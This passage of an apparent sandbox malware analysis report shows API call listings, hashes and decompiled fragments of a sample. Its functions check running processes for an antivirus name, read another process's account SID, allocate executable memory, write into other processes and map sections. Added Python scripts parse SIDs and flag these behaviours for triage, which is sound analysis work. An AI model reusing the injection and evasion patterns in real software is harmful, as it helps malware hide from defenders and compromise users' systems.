                              • StrRChrA.SHLWAPI(04B3B5B0,00000000,0000005C,?,?,?), ref: 01039332
                              • _strupr.NTDLL ref: 01039348
                              • lstrlen.KERNEL32(04B3B5B0,?,?), ref: 01039350
                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?), ref: 010393D0
                              • RtlAddVectoredExceptionHandler.NTDLL(00000000,010337EE), ref: 010393F7
                              • GetLastError.KERNEL32(?,?), ref: 01039411
                              • RtlRemoveVectoredExceptionHandler.NTDLL(00F9D858), ref: 01039427
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: ExceptionHandlerVectored$CreateErrorEventLastRemove_struprlstrlen
                              • String ID:
                              • API String ID: 2251957091-0
                              • Opcode ID: 06ba6ba0abc3f6e10ab4bfd1fb2167c371d89cae4c405f172256aded0abc01a8
                              • Instruction ID: 093da61855f995bbe9f76def2ab4b56485dfd581ddbd33be19b5f96864e40794
                              • Opcode Fuzzy Hash: 06ba6ba0abc3f6e10ab4bfd1fb2167c371d89cae4c405f172256aded0abc01a8
                              • Instruction Fuzzy Hash: 1F312AB2A042209FEB71AFBCE8C496F7BECB744344B054479FAD2D3188DA7A88408755
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 0102B0EC
                              • NtOpenProcessToken.NTDLL(?,00000008,?), ref: 0102B0FF
                              • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,?), ref: 0102B11B
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • NtQueryInformationToken.NTDLL(?,00000001,00000000,?,?), ref: 0102B138
                              • memcpy.NTDLL(?,00000000,0000001C), ref: 0102B145
                              • NtClose.NTDLL(?), ref: 0102B157
                              • NtClose.NTDLL(?), ref: 0102B161
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                              • String ID:
                              • API String ID: 2575439697-0
                              • Opcode ID: c41da6558a24637ae5b4e75c2712f0c8de218a53684d37ceb8b677bacc2d8c30
                              • Instruction ID: 8f736a227dcb8a98eb558af777bd0a4db0f79e59b84235f9e2bf30e3d05fdd10
                              • Opcode Fuzzy Hash: c41da6558a24637ae5b4e75c2712f0c8de218a53684d37ceb8b677bacc2d8c30
                              • Instruction Fuzzy Hash: 9F2148B6A00229FBDF119FA4CD85ADEBFBDEF08740F104026FA45E6110D7768A549BA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 38%
                              			E013E6C06(char _a4, void* _a8) {
                              				void* _v8;
                              				void* _v12;
                              				char _v16;
                              				void* _v20;
                              				char _v24;
                              				char _v28;
                              				char _v32;
                              				char _v36;
                              				char _v40;
                              				void* _v44;
                              				void** _t33;
                              				void* _t40;
                              				void* _t43;
                              				void** _t44;
                              				intOrPtr* _t47;
                              				char _t48;
                              
                              				asm("stosd");
                              				asm("stosd");
                              				asm("stosd");
                              				asm("stosd");
                              				asm("stosd");
                              				_v20 = _a4;
                              				_t48 = 0;
                              				_v16 = 0;
                              				_a4 = 0;
                              				_v44 = 0x18;
                              				_v40 = 0;
                              				_v32 = 0;
                              				_v36 = 0;
                              				_v28 = 0;
                              				_v24 = 0;
                              				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                              					_t33 =  &_v8;
                              					__imp__(_v12, 8, _t33);
                              					if(_t33 >= 0) {
                              						_t47 = __imp__;
                              						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                              						_t44 = E013E55DC(_a4);
                              						if(_t44 != 0) {
                              							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                              							if(_t40 >= 0) {
                              								memcpy(_a8,  *_t44, 0x1c);
                              								_t48 = 1;
                              							}
                              							E013E6DFA(_t44);
                              						}
                              						NtClose(_v8); // executed
                              					}
                              					NtClose(_v12);
                              				}
                              				return _t48;
                              			}

                              Per-statement instruction addresses for the C code above (the report's address column, separated from the code in extraction): 0x013e6c13, 0x013e6c14, 0x013e6c15, 0x013e6c16, 0x013e6c17, 0x013e6c1b, 0x013e6c22, 0x013e6c31, 0x013e6c34, 0x013e6c37, 0x013e6c3e, 0x013e6c41, 0x013e6c44, 0x013e6c47, 0x013e6c4a, 0x013e6c55, 0x013e6c57, 0x013e6c60, 0x013e6c68, 0x013e6c6a, 0x013e6c7c, 0x013e6c86, 0x013e6c8a, 0x013e6c99, 0x013e6c9d, 0x013e6ca6, 0x013e6cae, 0x013e6cae, 0x013e6cb0, 0x013e6cb0, 0x013e6cb8, 0x013e6cbe, 0x013e6cc2, 0x013e6cc2, 0x013e6ccd

                              APIs
                              • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 013E6C4D
                              • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 013E6C60
                              • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 013E6C7C
                                • Part of subcall function 013E55DC: RtlAllocateHeap.NTDLL(00000000,00000000,013E552C), ref: 013E55E8
                              • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 013E6C99
                              • memcpy.NTDLL(?,00000000,0000001C), ref: 013E6CA6
                              • NtClose.NTDLL(?), ref: 013E6CB8
                              • NtClose.NTDLL(00000000), ref: 013E6CC2
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                              • String ID:
                              • API String ID: 2575439697-0
                              • Opcode ID: bfc3c128190c0287929970405a6e924f51273e84ffa493e9c5b76928cf78e109
                              • Instruction ID: 3bc0cec0f7562a90a6ab7a47d74e38ef73332e4fc93368eedbada8453a35c0ce
                              • Opcode Fuzzy Hash: bfc3c128190c0287929970405a6e924f51273e84ffa493e9c5b76928cf78e109
                              • Instruction Fuzzy Hash: 8B2136B2900229FBDF119F99CC459DEBFBDEF18744F104026FA01EA190D7719A50DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%
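
E013E6C06 (the entry at 0102B0EC earlier on the page lists the same call sequence) opens the target process with access mask 0x400 (PROCESS_QUERY_INFORMATION), opens its token with 8 (TOKEN_QUERY), calls NtQueryInformationToken with class 1 (TokenUser) once to size the buffer and once to fill it, and then copies 0x1c bytes from the address held in the first field of that buffer, which is the Sid pointer of TOKEN_USER, into the caller's output. A SID is an 8-byte header plus 4 bytes per sub-authority, so 0x1c bytes is exactly a SID with five sub-authorities, the shape of an ordinary account SID S-1-5-21-a-b-c-RID; that the constant was chosen for that layout is an inference. The parser below is an added example, not code from the report or from the sample: it decodes such a blob into string form and checks whether a SID really has the length the sample copies (for a shorter SID such as S-1-5-18 the fixed-length copy would pick up whatever follows the SID in the heap buffer, a longer one would be truncated). The input SID is constructed for the example.

```python
import struct

SID_HEADER_LEN = 8   # Revision (1) + SubAuthorityCount (1) + IdentifierAuthority (6, big-endian)
COPIED_LEN = 0x1C    # the memcpy length in E013E6C06 and in the 0102B0EC variant


def sid_length(sub_authority_count: int) -> int:
    """Real size of a SID with that many 32-bit sub-authorities."""
    return SID_HEADER_LEN + 4 * sub_authority_count


def parse_sid(blob: bytes) -> str:
    """Decode a binary SID into 'S-R-I-S1-...'; raises ValueError on a truncated or unknown blob."""
    if len(blob) < SID_HEADER_LEN:
        raise ValueError("SID shorter than its header")
    revision, count = blob[0], blob[1]
    if revision != 1:
        raise ValueError(f"unsupported SID revision {revision}")
    authority = int.from_bytes(blob[2:8], "big")
    needed = sid_length(count)
    if len(blob) < needed:
        raise ValueError(f"SID declares {count} sub-authorities ({needed} bytes) but only {len(blob)} present")
    subs = struct.unpack_from(f"<{count}I", blob, SID_HEADER_LEN)   # sub-authorities are little-endian
    return "-".join(["S", str(revision), str(authority), *map(str, subs)])


def build_sid(authority: int, *subs: int) -> bytes:
    """Inverse of parse_sid; used here only to construct example input."""
    return bytes([1, len(subs)]) + authority.to_bytes(6, "big") + struct.pack(f"<{len(subs)}I", *subs)


def fits_copied_length(blob: bytes) -> bool:
    """True when the SID's real length is exactly the 0x1C bytes the sample copies."""
    return len(blob) >= 2 and sid_length(blob[1]) == COPIED_LEN


# Constructed sample: a typical local account SID (not taken from the analysed sample).
SAMPLE_USER_SID = build_sid(5, 21, 1234567890, 987654321, 1122334455, 1001)

if __name__ == "__main__":
    print(parse_sid(SAMPLE_USER_SID), len(SAMPLE_USER_SID), fits_copied_length(SAMPLE_USER_SID))
    print(parse_sid(build_sid(5, 18)), fits_copied_length(build_sid(5, 18)))
```

The practical use of the check is when reproducing whatever the sample derives from those 28 bytes: for a service or built-in account (S-1-5-18 is 12 bytes) the value would also depend on heap contents past the SID, so any derivation has to be replayed with the exact bytes the sample saw, not with the canonical SID alone.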

                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0103DA1F
                              • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 0103DA2C
                              • NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 0103DAB8
                              • GetModuleHandleA.KERNEL32(00000000), ref: 0103DAC3
                              • RtlImageNtHeader.NTDLL(00000000), ref: 0103DACC
                              • RtlExitUserThread.NTDLL(00000000), ref: 0103DAE1
                                • Part of subcall function 010322F0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,0103DA5A,?), ref: 010322F8
                                • Part of subcall function 010322F0: GetVersion.KERNEL32 ref: 01032307
                                • Part of subcall function 010322F0: GetCurrentProcessId.KERNEL32 ref: 0103231E
                                • Part of subcall function 010322F0: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 0103233B
                                • Part of subcall function 0102E0B6: memcpy.NTDLL(00000000,?,?,?), ref: 0102E115
                                • Part of subcall function 01044BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,01023E20), ref: 01044BF0
                                • Part of subcall function 010254B6: GetModuleHandleA.KERNEL32(?,010501F4,?,?,?,01033B88,00000000,010501F4,?,00000000), ref: 010254D7
                                • Part of subcall function 010254B6: GetProcAddress.KERNEL32(00000000,?), ref: 010254F0
                                • Part of subcall function 010254B6: OpenProcess.KERNEL32(00000400,00000000,01033B88,010501F4,?,?,?,01033B88,00000000,010501F4,?,00000000), ref: 0102550D
                                • Part of subcall function 010254B6: IsWow64Process.KERNEL32(00000000,00000000,010501F4,?,?,?,01033B88,00000000,010501F4,?,00000000), ref: 0102551E
                                • Part of subcall function 010254B6: CloseHandle.KERNEL32(00000000,?,?,01033B88,00000000,010501F4,?,00000000), ref: 01025531
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Process$HandleModule$CreateFileOpenThreadTime$AddressCloseCurrentEventExitHeaderHeapImageInformationNameProcQuerySystemUserVersionWow64memcpy
                              • String ID:
                              • API String ID: 3675227105-0
                              • Opcode ID: 4136cd86c578fe905fd097e8cd962b1cdbadf60146e870b35f34607104ec2f83
                              • Instruction ID: 1769c50b3d23d9d24842fc19de851d38b606142c442bf9ae8fc063d022a1dc93
                              • Opcode Fuzzy Hash: 4136cd86c578fe905fd097e8cd962b1cdbadf60146e870b35f34607104ec2f83
                              • Instruction Fuzzy Hash: DB31E3B1A40614EFD722EFA8DEC4AAE7BBCEB84740F504168F582E7245D738C941C790
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • memcpy.NTDLL(01033C59,01026017,00000800,01033C99,01033C99,?,00000000), ref: 0102D78F
                                • Part of subcall function 01029704: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,0102D660,?,?,01033C99,?,00000000), ref: 01029729
                                • Part of subcall function 01029704: GetProcAddress.KERNEL32(00000000,?), ref: 0102974B
                                • Part of subcall function 01029704: GetProcAddress.KERNEL32(00000000,?), ref: 01029761
                                • Part of subcall function 01029704: GetProcAddress.KERNEL32(00000000,?), ref: 01029777
                                • Part of subcall function 01029704: GetProcAddress.KERNEL32(00000000,?), ref: 0102978D
                                • Part of subcall function 01029704: GetProcAddress.KERNEL32(00000000,?), ref: 010297A3
                                • Part of subcall function 01023EB7: NtMapViewOfSection.NTDLL(00000000,000000FF,010396AE,00000000,00000000,010396AE,?,00000002,00000000,?,?,00000000,010396AE,000000FF,?), ref: 01023EE5
                                • Part of subcall function 01045F28: memcpy.NTDLL(575653E8,575653F0,?,?,01033C99,?,?,?,?,?,01033C99,?,00000000), ref: 01045F8E
                                • Part of subcall function 01045F28: memcpy.NTDLL(?,?,?), ref: 01045FED
                              • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,01033C99,?,00000000), ref: 0102D6BF
                              • memcpy.NTDLL(01033CB1,?,00000018,?,?,?,?,?,?,?,01033C99,?,00000000), ref: 0102D70B
                              • NtUnmapViewOfSection.NTDLL(000000FF,00000000,?,00000000), ref: 0102D7CD
                              • memset.NTDLL ref: 0102D7F5
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: AddressProcmemcpy$SectionView$HandleModuleUnmapmemset
                              • String ID:
                              • API String ID: 1575695328-0
                              • Opcode ID: 8cc092547d990697ecb6f8c7e3c4ed0f243cedf117f6ca10d46134d9f9cdf1f3
                              • Instruction ID: 5edd1e16747f493128689f020466b1ee5ba7c6047682ec4b4ad65848f33b403d
                              • Opcode Fuzzy Hash: 8cc092547d990697ecb6f8c7e3c4ed0f243cedf117f6ca10d46134d9f9cdf1f3
                              • Instruction Fuzzy Hash: B0916EB190021AEFDB51DF98C984BEEBBF4FF08304F1441A9E985A7251E775AA44CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 68%
                              			E013E3309() {
                              				char _v264;
                              				void* _v300;
                              				void* _t5;
                              				int _t8;
                              				intOrPtr _t9;
                              				int _t15;
                              				void* _t17;
                              
                              				_t15 = 0;
                              				_t5 = CreateToolhelp32Snapshot(2, 0); // executed
                              				_t17 = _t5;
                              				if(_t17 != 0) {
                              					_t8 = Process32First(_t17,  &_v300);
                              					while(_t8 != 0) {
                              						_t9 =  *0x13ed2b8; // 0x26ea5a8
                              						_t2 = _t9 + 0x13eee88; // 0x73617661
                              						_push( &_v264);
                              						if( *0x13ed110() != 0) {
                              							_t15 = 1;
                              						} else {
                              							_t8 = Process32Next(_t17,  &_v300);
                              							continue;
                              						}
                              						L7:
                              						CloseHandle(_t17);
                              						goto L8;
                              					}
                              					goto L7;
                              				}
                              				L8:
                              				return _t15;
                              			}

                              Per-statement instruction addresses for the C code above (the report's address column, separated from the code in extraction; 0x00000000 marks a statement without an address): 0x013e3314, 0x013e3319, 0x013e331e, 0x013e3322, 0x013e332c, 0x013e335d, 0x013e3333, 0x013e3338, 0x013e3345, 0x013e334e, 0x013e3365, 0x013e3350, 0x013e3358, 0x00000000, 0x013e3358, 0x013e3366, 0x013e3367, 0x00000000, 0x013e3367, 0x00000000, 0x013e3361, 0x013e336d, 0x013e3372

                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 013E3319
                              • Process32First.KERNEL32(00000000,?), ref: 013E332C
                              • Process32Next.KERNEL32(00000000,?), ref: 013E3358
                              • CloseHandle.KERNEL32(00000000), ref: 013E3367
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                              • String ID:
                              • API String ID: 420147892-0
                              • Opcode ID: eea49d895e02a8985fb17414bf6375d0f93b065b66668ec5508ab277e0eb1583
                              • Instruction ID: c39df7d37e1b9d92e8786106b8e28413ff280f61b2ce97404100a30e71d2655b
                              • Opcode Fuzzy Hash: eea49d895e02a8985fb17414bf6375d0f93b065b66668ec5508ab277e0eb1583
                              • Instruction Fuzzy Hash: A9F0F6325003386AD770E6699C0CEEB77ECFBC5728F000061F959C31C4EE20CA4987A1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtCreateSection.NTDLL(01033C99,000F001F,?,?,?,08000000,00000000,74784EE0,00000000,00000000), ref: 01039697
                                • Part of subcall function 01023EB7: NtMapViewOfSection.NTDLL(00000000,000000FF,010396AE,00000000,00000000,010396AE,?,00000002,00000000,?,?,00000000,010396AE,000000FF,?), ref: 01023EE5
                              • memset.NTDLL ref: 010396BB
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Section$CreateViewmemset
                              • String ID: @
                              • API String ID: 2533685722-2766056989
                              • Opcode ID: 58eb199baf22e92f241a5e4e7275f1aa377c549cc96e7f139b6cc6e9e22613ff
                              • Instruction ID: 43a7ab9a2de6d4e7252e298dc1c475d852b38549ca11a1d5177a594207d4b143
                              • Opcode Fuzzy Hash: 58eb199baf22e92f241a5e4e7275f1aa377c549cc96e7f139b6cc6e9e22613ff
                              • Instruction Fuzzy Hash: 6F213BB2D0020DAFCB01DFA9C8809EEFBB9FF48354F104529E655F7250D770AA488B64
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetProcAddress.KERNEL32(?,00000318), ref: 010467F2
                              • NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 0104680E
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                                • Part of subcall function 01031635: GetProcAddress.KERNEL32(?,00000000), ref: 0103165E
                                • Part of subcall function 01031635: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,0104684F,00000000,00000000,00000028,00000100), ref: 01031680
                              • StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 01046978
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: AddressProcWow64$AllocateHeapInformationMemory64Process64QueryReadVirtual
                              • String ID:
                              • API String ID: 3547194813-0
                              • Opcode ID: 7c96c1b2d4de6c6816168524b246105c735c041af45d15d59aaeb925ca9b9f0f
                              • Instruction ID: f228909c4d8b2b4d3e4de487c634a88e32db102b4068e659b028bce83b71c4be
                              • Opcode Fuzzy Hash: 7c96c1b2d4de6c6816168524b246105c735c041af45d15d59aaeb925ca9b9f0f
                              • Instruction Fuzzy Hash: 75614FB4A00206ABDB55CF98C980BEEBBF8FF49300F044569E995E7245E771E954CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • memset.NTDLL ref: 0103C52F
                              • GetProcAddress.KERNEL32(?), ref: 0103C557
                              • NtWow64QueryInformationProcess64.NTDLL(?,00000000,?,00000030,00000000,?,00001000,00000000), ref: 0103C575
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: AddressInformationProcProcess64QueryWow64memset
                              • String ID:
                              • API String ID: 2968673968-0
                              • Opcode ID: 3efe6317da471a646de21b50010a8a50668f18413ac2311ff1b4f60f1c57f422
                              • Instruction ID: d6b8440ca98ecb5dacf98b0ada86416dfe868c5f1bf81abf053cecae1bd2f4fd
                              • Opcode Fuzzy Hash: 3efe6317da471a646de21b50010a8a50668f18413ac2311ff1b4f60f1c57f422
                              • Instruction Fuzzy Hash: 7D11C675A0021DAFEB51CB98DD45F9E7BBCEB88740F040125F944E7294E770EA45CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtAllocateVirtualMemory.NTDLL(0102C119,00000000,00000000,0102C119,00003000,00000040), ref: 010309FB
                              • RtlNtStatusToDosError.NTDLL(00000000), ref: 01030A02
                              • SetLastError.KERNEL32(00000000), ref: 01030A09
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Error$AllocateLastMemoryStatusVirtual
                              • String ID:
                              • API String ID: 722216270-0
                              • Opcode ID: e171a2042ae48906269b8bc8c4907c72d7a703daa37b251a2834c18927fab38d
                              • Instruction ID: 8152efa07a970439d7c6ee76bc3761a890ffc8a00bf110d51e27e5d48a86a0a6
                              • Opcode Fuzzy Hash: e171a2042ae48906269b8bc8c4907c72d7a703daa37b251a2834c18927fab38d
                              • Instruction Fuzzy Hash: ABF05EB5611309FBEB15CF94DA59F9EBABCAB04305F100048B601A6080EBB9AB00DB68
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,00000004,?,?,?,74786780,?,0103FDBE,?,00000004,?,00000004,?), ref: 01045008
                              • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01045017
                              • SetLastError.KERNEL32(00000000,?,0103FDBE,?,00000004,?,00000004,?,?,?,?,01033C11,?,?,CCCCFEEB,?), ref: 0104501E
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Error$LastMemoryStatusVirtualWrite
                              • String ID:
                              • API String ID: 1089604434-0
                              • Opcode ID: 135cea67b62e5376cc420d2216e4a2df1012d9a70bb2e9bafb5cfae978b99cdf
                              • Instruction ID: 2e5250814b55ac55f5af61e72bb855e9b634318a87d66bfee503d2c56ccfee90
                              • Opcode Fuzzy Hash: 135cea67b62e5376cc420d2216e4a2df1012d9a70bb2e9bafb5cfae978b99cdf
                              • Instruction Fuzzy Hash: C0E0487A20011AEBDF115ED89D48D8A7F69EB0C781B004020BF41C3121C737C820EBE0
                              Uniqueness

                              Uniqueness Score: -1.00%
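
Read one at a time, the API entries in this part of the report are unremarkable; what matters for triage is which calls sit together in one function and with which arguments. NtOpenProcess(…, 0x400) is followed by NtOpenProcessToken(…, 8) and NtQueryInformationToken(…, 1). E013E3309 walks CreateToolhelp32Snapshot/Process32First/Process32Next and compares each szExeFile (the PROCESSENTRY32 field at _v264) against a string whose first dword the decompiler annotates as 0x73617661, which is the bytes 'a','v','a','s' in little-endian order; the rest of that string and the comparison routine behind the indirect call at 0x13ed110 are not on the page. NtCreateSection has NtMapViewOfSection in a subcall, and another function brackets memcpy with NtMapViewOfSection and NtUnmapViewOfSection. NtWow64QueryInformationProcess64 and NtWow64ReadVirtualMemory64 are the ntdll exports a 32-bit process uses to inspect 64-bit processes. The NtAllocateVirtualMemory and NtWriteVirtualMemory entries are three-call wrappers (native call, RtlNtStatusToDosError, SetLastError), the same steps kernel32's own wrappers perform, so monitoring that hooks only the kernel32 exports will not see them; the allocation passes 0x3000 (MEM_COMMIT|MEM_RESERVE) and 0x40 (PAGE_EXECUTE_READWRITE). The script below is an added example, not code from the report or from Joe Sandbox: it parses lines in the report's "APIs" format, including the "Part of subcall function" entries, and matches each function entry against small argument-aware rules. The rule names are this example's own labels, not sandbox signature names, and the sample input is copied from four entries on this page.

```python
import re
import textwrap

# One line of a Joe Sandbox "APIs" entry, e.g.
#   • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 013E6C4D
#   • Part of subcall function 013E55DC: RtlAllocateHeap.NTDLL(00000000,00000000,013E552C), ref: 013E55E8
LINE_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?"
    r"\s*,?\s*(?:ref:\s*(?P<ref>[0-9A-Fa-f]+))?"
)

# Behaviour rules (labels are this example's own): every (api, {arg_index: value}) requirement
# must be satisfied by some call in the entry, direct or via a listed subcall.
RULES = {
    "process walk (Toolhelp32)": [("CreateToolhelp32Snapshot", {}), ("Process32First", {}), ("Process32Next", {})],
    "TokenUser read from another process": [("NtOpenProcess", {1: 0x400}),          # PROCESS_QUERY_INFORMATION
                                            ("NtOpenProcessToken", {1: 8}),         # TOKEN_QUERY
                                            ("NtQueryInformationToken", {1: 1})],   # TokenUser
    "section map/unmap around memcpy": [("NtMapViewOfSection", {}), ("NtUnmapViewOfSection", {}), ("memcpy", {})],
    "RWX allocation": [("NtAllocateVirtualMemory", {4: 0x3000, 5: 0x40})],          # MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE
    "WoW64 access to 64-bit process": [("NtWow64QueryInformationProcess64", {})],
}


def _parse_args(text):
    """'00000000,00000400,?,?' -> [0, 0x400, None, None]; '?' is an argument the sandbox could not resolve."""
    if not text:
        return []
    return [None if a.strip() == "?" else int(a, 16) for a in text.split(",")]


def parse_listing(text):
    """Split report text into entries (one per 'APIs' header) holding their parsed calls."""
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = {"calls": []}
            entries.append(current)
        elif line.startswith("Memory Dump Source"):
            current = None
        elif current is not None and (m := LINE_RE.match(line)):
            current["calls"].append({"api": m["api"], "module": m["mod"], "args": _parse_args(m["args"]),
                                     "ref": m["ref"], "via": m["sub"]})
    return entries


def entry_label(entry):
    """Address of the entry's first direct call, which is how the report identifies the function."""
    return next((c["ref"] for c in entry["calls"] if c["via"] is None), "?")


def matches(entry, rule):
    for api, wanted in rule:
        if not any(c["api"] == api and all(i < len(c["args"]) and c["args"][i] == v for i, v in wanted.items())
                   for c in entry["calls"]):
            return False
    return True


def triage(text):
    """{entry label: sorted names of the rules that fire on it}."""
    return {entry_label(e): sorted(n for n, r in RULES.items() if matches(e, r)) for e in parse_listing(text)}


# Sample input: four entries copied from this report (the text between 'APIs' and 'Memory Dump Source').
SAMPLE_LISTING = textwrap.dedent("""\
    APIs
    • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 013E6C4D
    • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 013E6C60
    • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 013E6C7C
      • Part of subcall function 013E55DC: RtlAllocateHeap.NTDLL(00000000,00000000,013E552C), ref: 013E55E8
    • memcpy.NTDLL(?,00000000,0000001C), ref: 013E6CA6
    • NtClose.NTDLL(?), ref: 013E6CB8
    Memory Dump Source
    APIs
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 013E3319
    • Process32First.KERNEL32(00000000,?), ref: 013E332C
    • Process32Next.KERNEL32(00000000,?), ref: 013E3358
    • CloseHandle.KERNEL32(00000000), ref: 013E3367
    Memory Dump Source
    APIs
    • memcpy.NTDLL(01033C59,01026017,00000800,01033C99,01033C99,?,00000000), ref: 0102D78F
      • Part of subcall function 01023EB7: NtMapViewOfSection.NTDLL(00000000,000000FF,010396AE,00000000,00000000,010396AE,?,00000002,00000000,?,?,00000000,010396AE,000000FF,?), ref: 01023EE5
    • NtUnmapViewOfSection.NTDLL(000000FF,00000000,?,00000000), ref: 0102D7CD
    • memset.NTDLL ref: 0102D7F5
    Memory Dump Source
    APIs
    • NtAllocateVirtualMemory.NTDLL(0102C119,00000000,00000000,0102C119,00003000,00000040), ref: 010309FB
    • RtlNtStatusToDosError.NTDLL(00000000), ref: 01030A02
    • SetLastError.KERNEL32(00000000), ref: 01030A09
    Memory Dump Source
""")

if __name__ == "__main__":
    for label, hits in triage(SAMPLE_LISTING).items():
        print(label, hits)
```

Matching on argument values is what keeps the rules honest: NtQueryInformationToken with class 1 means the caller wants the account SID, a different class would mean something else entirely, and an allocation with protection 0x40 is the one worth following into the NtWriteVirtualMemory wrapper listed above. Calls reached through "Part of subcall function" count, because the report attributes NtMapViewOfSection to a helper even though the mapping belongs to the caller's behaviour.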

                              C-Code - Quality: 21%
                              			E013E4638(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, char _a8) {
                              				void* _v8;
                              				char _v12;
                              				signed int _t34;
                              				long _t36;
                              				long _t37;
                              				signed int _t38;
                              				void* _t39;
                              				signed int _t40;
                              				intOrPtr _t42;
                              				intOrPtr _t43;
                              				intOrPtr _t45;
                              				void* _t56;
                              				intOrPtr _t57;
                              				void* _t63;
                              				intOrPtr* _t65;
                              				intOrPtr* _t66;
                              				void* _t69;
                              
                              				_t66 = __esi;
                              				_t63 = E013E65F6(_t34, _a4);
                              				if(_t63 == 0) {
                              					L18:
                              					_t36 = GetLastError();
                              				} else {
                              					_t37 = GetVersion();
                              					_t69 = _t37 - 6;
                              					if(_t69 > 0 || _t69 == 0 && _t37 > 2) {
                              						_a4 = 4;
                              					} else {
                              						_a4 = 0;
                              					}
                              					__imp__(_t63, _a4, 0, 0, 0); // executed
                              					 *(_t66 + 0x10) = _t37;
